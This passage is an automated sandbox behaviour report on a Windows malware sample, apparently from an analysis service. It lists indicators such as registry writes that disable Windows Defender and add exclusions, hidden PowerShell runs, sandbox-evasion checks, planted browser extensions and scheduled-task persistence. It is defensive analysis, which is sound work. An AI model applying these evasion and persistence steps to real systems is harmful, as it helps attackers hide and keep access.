Analysis
-
max time kernel
242s -
max time network
243s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
13-06-2024 23:37
Static task
static1
Behavioral task
behavioral1
Sample
98022e0a3770adaa832a90228c525f088cc6a8150acdf3acbfac20349b98b198.exe
Resource
win7-20240508-en
General
-
Target
98022e0a3770adaa832a90228c525f088cc6a8150acdf3acbfac20349b98b198.exe
-
Size
7.3MB
-
MD5
81bffdb87c9589fd385f8e9b20312c9f
-
SHA1
3316a2d0659904450ad6c09c92bea409ce3f96c0
-
SHA256
98022e0a3770adaa832a90228c525f088cc6a8150acdf3acbfac20349b98b198
-
SHA512
0018adc89dc836ddb92b7ffeb46b9d80e8d8634b152663ca9c1fd7aed776b5dfce1c91a6dd92c983b0e9c9c01b3811a8c90224fb7f848f86154c080699e97ce3
-
SSDEEP
196608:91OEHze/yrGy9O5ND4NQ/gq/C60ZYIV8HtJ+Bp15WKNu:3Ou/eZPEaIktJ+BxG
Malware Config
Signatures
-
Processes:
reg.exereg.exereg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe -
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\RFIumDCEBXXU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\gLbKcqvTyliDAKYm = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\AClHKqYMJaBBC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\gLbKcqvTyliDAKYm = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\RFIumDCEBXXU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ijLlchIpU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\vEcQBTYFTXUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\xSxYkcSdbazbYzGpZTR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\oBeyQrPqBvPiiLVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\AClHKqYMJaBBC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ijLlchIpU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\xSxYkcSdbazbYzGpZTR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\vEcQBTYFTXUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\oBeyQrPqBvPiiLVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\gLbKcqvTyliDAKYm = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\gLbKcqvTyliDAKYm = "0" reg.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.EXEpowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exepid process 2164 powershell.exe 832 powershell.EXE 2192 powershell.exe 2664 powershell.exe 2692 powershell.exe 1432 powershell.EXE 2244 powershell.EXE 2136 powershell.exe 2888 powershell.EXE 2492 powershell.exe 1244 powershell.exe 912 powershell.exe 2200 powershell.EXE 1440 powershell.exe 1892 powershell.exe 868 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
XzkMenS.exeZbjsrWF.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Control Panel\International\Geo\Nation XzkMenS.exe Key value queried \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Control Panel\International\Geo\Nation ZbjsrWF.exe -
Executes dropped EXE 6 IoCs
Processes:
Install.exeInstall.exenJvUBDN.exeXzkMenS.exenJvUBDN.exeZbjsrWF.exepid process 1532 Install.exe 2080 Install.exe 2440 nJvUBDN.exe 2904 XzkMenS.exe 2572 nJvUBDN.exe 1028 ZbjsrWF.exe -
Loads dropped DLL 29 IoCs
Processes:
98022e0a3770adaa832a90228c525f088cc6a8150acdf3acbfac20349b98b198.exeInstall.exeInstall.exeWerFault.exeWerFault.exerundll32.exeWerFault.exeWerFault.exeWerFault.exepid process 492 98022e0a3770adaa832a90228c525f088cc6a8150acdf3acbfac20349b98b198.exe 1532 Install.exe 1532 Install.exe 1532 Install.exe 1532 Install.exe 2080 Install.exe 2080 Install.exe 2080 Install.exe 2808 WerFault.exe 2808 WerFault.exe 2808 WerFault.exe 3024 WerFault.exe 3024 WerFault.exe 3024 WerFault.exe 2364 rundll32.exe 2364 rundll32.exe 2364 rundll32.exe 2364 rundll32.exe 1724 WerFault.exe 1724 WerFault.exe 1724 WerFault.exe 1724 WerFault.exe 1724 WerFault.exe 1644 WerFault.exe 1644 WerFault.exe 1644 WerFault.exe 2748 WerFault.exe 2748 WerFault.exe 2748 WerFault.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
Processes:
XzkMenS.exeZbjsrWF.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json XzkMenS.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json ZbjsrWF.exe -
Drops file in System32 directory 27 IoCs
Processes:
powershell.EXEpowershell.EXEXzkMenS.exepowershell.exerundll32.exenJvUBDN.exepowershell.EXEpowershell.exeZbjsrWF.exepowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.exenJvUBDN.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat XzkMenS.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol nJvUBDN.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat ZbjsrWF.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol nJvUBDN.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini nJvUBDN.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol nJvUBDN.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini nJvUBDN.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol ZbjsrWF.exe File created C:\Windows\system32\GroupPolicy\gpt.ini nJvUBDN.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol XzkMenS.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Program Files directory 23 IoCs
Processes:
XzkMenS.exeZbjsrWF.exedescription ioc process File created C:\Program Files (x86)\xSxYkcSdbazbYzGpZTR\rqRxzHI.dll XzkMenS.exe File created C:\Program Files (x86)\AClHKqYMJaBBC\adosevO.dll XzkMenS.exe File created C:\Program Files (x86)\RFIumDCEBXXU2\qbtnbtE.xml ZbjsrWF.exe File created C:\Program Files (x86)\ijLlchIpU\NoqaUQ.dll XzkMenS.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi XzkMenS.exe File created C:\Program Files (x86)\RFIumDCEBXXU2\JYhaqgA.xml XzkMenS.exe File created C:\Program Files (x86)\AClHKqYMJaBBC\ynCWQkO.xml XzkMenS.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak XzkMenS.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi ZbjsrWF.exe File created C:\Program Files (x86)\RFIumDCEBXXU2\ENuoNqraTUmQR.dll XzkMenS.exe File created C:\Program Files (x86)\ijLlchIpU\aSPUfOo.xml ZbjsrWF.exe File created C:\Program Files (x86)\xSxYkcSdbazbYzGpZTR\wIpMDLO.xml ZbjsrWF.exe File created C:\Program Files (x86)\vEcQBTYFTXUn\YSYYqPD.dll ZbjsrWF.exe File created C:\Program Files (x86)\ijLlchIpU\mFPtMGC.xml XzkMenS.exe File created C:\Program Files (x86)\xSxYkcSdbazbYzGpZTR\abFxgvs.xml XzkMenS.exe File created C:\Program Files (x86)\vEcQBTYFTXUn\lfoscBd.dll XzkMenS.exe File created C:\Program Files (x86)\RFIumDCEBXXU2\BXtZZzQFsUfCJ.dll ZbjsrWF.exe File created C:\Program Files (x86)\xSxYkcSdbazbYzGpZTR\yaxuyPi.dll ZbjsrWF.exe File created C:\Program Files (x86)\AClHKqYMJaBBC\thrHlFT.dll ZbjsrWF.exe File created C:\Program Files (x86)\AClHKqYMJaBBC\ekwkJLy.xml ZbjsrWF.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi XzkMenS.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja XzkMenS.exe File created C:\Program Files (x86)\ijLlchIpU\XZzFUC.dll ZbjsrWF.exe -
Drops file in Windows directory 6 IoCs
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription ioc process File created C:\Windows\Tasks\erLaEdTsgGebTau.job schtasks.exe File opened for modification C:\Windows\Tasks\GSDaywQPJdyrKXMOz.job schtasks.exe File opened for modification C:\Windows\Tasks\erLaEdTsgGebTau.job schtasks.exe File created C:\Windows\Tasks\hijxFSKlICFAhziPp.job schtasks.exe File created C:\Windows\Tasks\bGTnZQDECKwDuNSWyq.job schtasks.exe File created C:\Windows\Tasks\GSDaywQPJdyrKXMOz.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 5 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 2808 2440 WerFault.exe nJvUBDN.exe 3024 2572 WerFault.exe nJvUBDN.exe 1724 2080 WerFault.exe Install.exe 1644 2904 WerFault.exe XzkMenS.exe 2748 1028 WerFault.exe ZbjsrWF.exe -
Creates scheduled task(s) 1 TTPs 21 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2240 schtasks.exe 2836 schtasks.exe 1736 schtasks.exe 2792 schtasks.exe 1976 schtasks.exe 2680 schtasks.exe 1968 schtasks.exe 1848 schtasks.exe 1280 schtasks.exe 2300 schtasks.exe 2736 schtasks.exe 2560 schtasks.exe 2736 schtasks.exe 2868 schtasks.exe 2396 schtasks.exe 860 schtasks.exe 2656 schtasks.exe 2796 schtasks.exe 708 schtasks.exe 480 schtasks.exe 2628 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
Install.exerundll32.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
XzkMenS.exenJvUBDN.exepowershell.exeZbjsrWF.exerundll32.exewscript.exepowershell.exepowershell.exenJvUBDN.exepowershell.exedescription ioc process Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0036000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 XzkMenS.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad XzkMenS.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" nJvUBDN.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ nJvUBDN.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix ZbjsrWF.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000005000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0036000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" ZbjsrWF.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000004000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0036000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-a7-9c-5d-1a-03 rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-a7-9c-5d-1a-03\WpadDecisionReason = "1" XzkMenS.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-a7-9c-5d-1a-03\WpadDecisionReason = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ XzkMenS.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings XzkMenS.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad ZbjsrWF.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{699017BE-42D6-4DAC-9A5F-C5B9345BADC5}\WpadDecisionReason = "1" ZbjsrWF.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{699017BE-42D6-4DAC-9A5F-C5B9345BADC5}\WpadDecisionTime = 807c74ffeabdda01 ZbjsrWF.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 80ff17bbeabdda01 powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{699017BE-42D6-4DAC-9A5F-C5B9345BADC5}\WpadDecisionTime = 401f4ae5eabdda01 XzkMenS.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-a7-9c-5d-1a-03\WpadDecisionTime = 8042cb00ebbdda01 XzkMenS.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{699017BE-42D6-4DAC-9A5F-C5B9345BADC5}\WpadDecisionTime = 402ed202ebbdda01 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-a7-9c-5d-1a-03 XzkMenS.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 XzkMenS.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{699017BE-42D6-4DAC-9A5F-C5B9345BADC5}\WpadDecisionReason = "1" XzkMenS.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-a7-9c-5d-1a-03\WpadDecisionTime = 401f4ae5eabdda01 ZbjsrWF.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-a7-9c-5d-1a-03\WpadDecisionTime = 8042cb00ebbdda01 rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{699017BE-42D6-4DAC-9A5F-C5B9345BADC5} XzkMenS.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{699017BE-42D6-4DAC-9A5F-C5B9345BADC5}\WpadDecisionTime = 8042cb00ebbdda01 XzkMenS.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 XzkMenS.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{699017BE-42D6-4DAC-9A5F-C5B9345BADC5}\WpadNetworkName = "Network 3" XzkMenS.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-a7-9c-5d-1a-03 ZbjsrWF.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{699017BE-42D6-4DAC-9A5F-C5B9345BADC5}\WpadNetworkName = "Network 3" rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-a7-9c-5d-1a-03\WpadDecisionTime = 402ed202ebbdda01 rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-a7-9c-5d-1a-03\WpadDecisionTime = 402ed202ebbdda01 ZbjsrWF.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000c01bdabaeabdda01 nJvUBDN.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" ZbjsrWF.exe Set value (int) 